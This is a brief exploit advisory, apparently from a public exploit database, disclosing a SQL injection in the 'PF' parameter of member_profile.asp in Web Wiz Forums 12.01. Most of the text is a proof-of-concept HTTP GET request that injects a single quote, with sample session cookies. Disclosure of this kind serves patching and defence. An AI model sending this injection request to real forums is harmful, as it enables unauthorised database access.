Share
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection  
# Date: 2019-09-16  
# Exploit Author: n1x_ [MS-WEB]  
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm  
# Version: 12.01  
# Tested on Windows  
  
# Vulnerable parameter: PF (member_profile.asp)  
# GET Request  
  
GET /member_profile.asp?PF=10' HTTP/1.1  
Host: host  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD  
Connection: close  
Upgrade-Insecure-Requests: 1